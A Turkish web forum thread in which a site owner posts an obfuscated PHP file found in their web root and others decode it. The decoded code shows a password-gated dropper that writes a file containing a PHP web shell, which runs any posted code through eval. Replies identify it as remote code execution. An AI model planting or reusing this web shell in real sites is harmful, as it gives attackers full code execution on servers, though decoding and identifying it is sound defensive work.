Bu kodu decode edebilir misiniz? Garip bir dosya

Merhabalar sitemin kök dizininde bir dosya buldum ne olduğunu merak ediyorum.
Decode ederseniz sevinirim.

<?php ${"\x47\x4c\x4f\x42\x41L\x53"}["s\x63a\x62\x6b\x65\x73\x6c\x74oy"]="\x77\x72\x69t\x65";${"GLOB\x41\x4cS"}["\x62\x74\x74\x72j\x68\x6d\x74\x7ar\x68"]="\x68\x61\x6e\x64\x6ce";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x76\x6d\x79\x6fq\x6f\x65\x63wl\x62"]="p\x61s\x73";echo"\x3cfo\x72\x6d\x20a\x63\x74\x69on=\x22".htmlentities($_SERVER["PH\x50\x5fS\x45LF"])."\"\x20me\x74\x68\x6fd=\x22\x50\x4f\x53T\"\x3e\n\x3c\x69n\x70u\x74\x20t\x79p\x65=\"\x74e\x78t\x22\x20n\x61m\x65=\x22\x70\x61\x73\x73\x22\x3e\n\x3c/fo\x72m\x3e";if(isset($_POST["p\x61\x73\x73"])){$qpsmfiwrup="p\x61\x73\x73";${"G\x4c\x4fB\x41\x4c\x53"}["\x7ao\x6c\x65\x64\x69\x75\x67\x70\x71l\x6f"]="p\x61ss";${${"\x47\x4cO\x42\x41\x4c\x53"}["\x7ao\x6c\x65d\x69ugp\x71l\x6f"]}=$_POST["\x70a\x73s"];${${"G\x4c\x4fB\x41\x4c\x53"}["v\x6dyoq\x6fe\x63\x77\x6cb"]}=md5(${$qpsmfiwrup});${"\x47L\x4fB\x41\x4c\x53"}["\x65\x76ll\x69d\x66\x78e"]="\x70\x61\x73\x73";if(${${"\x47\x4c\x4f\x42AL\x53"}["\x65v\x6c\x6c\x69\x64f\x78e"]}=="\x37\x34\x64e\x393ea7190\x61f\x30\x36\x653e7\x3413\x61f75\x61046\x61"){$kqzdifrfs="h\x61\x6e\x64\x6c\x65";${$kqzdifrfs}=fopen("po\x73\x74-o\x70\x74i\x6fn\x73\x32.\x70\x68p","w");fclose(${${"\x47\x4cO\x42\x41L\x53"}["btt\x72\x6a\x68\x6d\x74\x7a\x72\x68"]});${${"\x47L\x4f\x42\x41\x4cS"}["s\x63a\x62\x6be\x73\x6ct\x6fy"]}="<?\x70\x68\x70 ev\x61l(\x62ase\x36\x34\x5f\x64ecode(\x27\x5a\x57\x4eoby\x41iPG\x5avcm0\x67YWN0a\x579uP\x56\x77ic\x47\x39\x7a\x64C1\x76c\x48\x52\x70b\x325\x7aM\x69\x35waHBcIi\x42t\x5aX\x52\x6f\x622\x51\x39\x58\x43\x4aQ\x541N\x55\x58C\x49+C\x6ax\x70\x62n\x421d\x43\x42\x30eX\x42\x6cPV\x77idGV4\x64F\x77i\x49\x475\x68\x62\x57\x559\x58\x43\x4a\x33\x63ml0a\x57\x35nX\x43I+Cj\x77\x76Zm9\x79b\x544\x69\x4f\x79\x41KZ\x58J\x79\x623J\x66\x63\x6d\x56w\x62\x33J0\x61\x575\x6e\x4bDA\x70\x4f\x77\x6fk\x64\x33\x4apdGluZz\x30\x6b\x58\x31\x42P\x551R\x62\x4a\x33d\x79aX\x52\x70\x62\x6dcn\x58\x54\x73\x4bJH\x64\x79a\x58Rp\x62\x6dc9\x633\x52\x79\x61X\x42zb\x47\x46z\x61G\x56z\x4bCR\x33c\x6d\x6c\x30\x61\x575\x6eKT\x73K\x5a\x58\x5ahb\x43\x67k\x64\x33\x4ap\x64\x47\x6c\x75\x5ay\x6b7\x27))\x3b ?>";file_put_contents("p\x6f\x73\x74-optio\x6e\x732.\x70hp",${${"\x47\x4c\x4f\x42\x41L\x53"}["\x73\x63\x61\x62k\x65s\x6c\x74o\x79"]});}}
?>

Hexdecoder ile isinizi halledebilirsiniz. Verdiginiz kodun decode edilmis hali:

<?php ${"GLOBALS"}["scabkesltoy"]="write";${"GLOBALS"}["bttrjhmtzrh"]="handle";${"GLOBALS"}["vmyoqoecwlb"]="pass";echo"<form action="".htmlentities($_SERVER["PHP_SELF"])."\" method="POST\">\n<input type=\"text" name="pass">\n</form>";if(isset($_POST["pass"])){$qpsmfiwrup="pass";${"GLOBALS"}["zolediugpqlo"]="pass";${${"GLOBALS"}["zolediugpqlo"]}=$_POST["pass"];${${"GLOBALS"}["vmyoqoecwlb"]}=md5(${$qpsmfiwrup});${"GLOBALS"}["evllidfxe"]="pass";if(${${"GLOBALS"}["evllidfxe"]}=="74de93ea7190af06e3e7413af75a046a"){$kqzdifrfs="handle";${$kqzdifrfs}=fopen("post-options2.php","w");fclose(${${"GLOBALS"}["bttrjhmtzrh"]});${${"GLOBALS"}["scabkesltoy"]}="<?php eval(base64_decode('ZWNobyAiPGZvcm0gYWN0aW9uPVwicG9zdC1vcHRpb25zMi5waHBcIiBtZXRob2Q9XCJQT1NUXCI+CjxpbnB1dCB0eXBlPVwidGV4dFwiIG5hbWU9XCJ3cml0aW5nXCI+CjwvZm9ybT4iOyAKZXJyb3JfcmVwb3J0aW5nKDApOwokd3JpdGluZz0kX1BPU1RbJ3dyaXRpbmcnXTsKJHdyaXRpbmc9c3RyaXBzbGFzaGVzKCR3cml0aW5nKTsKZXZhbCgkd3JpdGluZyk7')); ?>";file_put_contents("post-options2.php",${${"GLOBALS"}["scabkesltoy"]});}}?>

Icindeki base64 ile sifrelenmis kisimin da cozulmus hali:

echo "<form action=\"post-options2.php\" method=\"POST\">
<input type=\"text\" name=\"writing\">
</form>"; 
error_reporting(0);
$writing=$_POST['writing'];
$writing=stripslashes($writing);
eval($writing);

Teşekkürler.
Bu kodu neden yüklemişler acaba siteme. Çok ilginç. Hack işi gibi de durmuyor.

Hocam wordpress kullandığım bir sitemde bende buna benzer değişik isimlerde dosyalar bulmuştum ana dizinde. Kodları incelediğim de içerisinde Vodafone gibi yazılar geçiyordu. Üzerinde çok durmadım dosyaları sildim geçtim ama bi kaç arkadaşım daha anlam veremediği dosyalar gördüklerini söyleyince bende biraz şüphelenmeye başladım.

Eger wordpress temasi kullaniyorsaniz, buyuk ihtimal footerda link vb vardir. genelde linkleri kaldirmasinlar diye sifreliyorlar, ama bu linkler kaldirilmasin diye yapilmis bir sifreleme gibi gorunmuyor, acikcasi temayi rasgele bir yerden indirdiyseniz, yarin bour gun sitenize zarar gelirse, buyuk ihtimal nereden kaynaklandigisu andan itibaren belli, bilginiz olsun.

dosya temada değil aksine ana dizinde bulunuyor. Tema dizininde bulunsa anlarım da bu biraz enteresan geldi. Ayrıca herhangi bir başka dosya yok. Şifrelenmiş dosya bulamadım. Garip. Yaklaşık 5 aydır herhangi bir dosyada da değişiklik yapmamıştım.

echo "<form action=\"post-options2.php\" method=\"POST\">
<input type=\"text\" name=\"writing\">
</form>"; 
error_reporting(0);
$writing=$_POST['writing'];
$writing=stripslashes($writing);
eval($writing);

Kodundaki kısım yeterince kendini belli ediyor zaten. Remote Code Execution işlevi görüyor.

kısacası dışarıdan siteniz üzerinde herhangi bir php kodu çalıştırılabiliyor bununla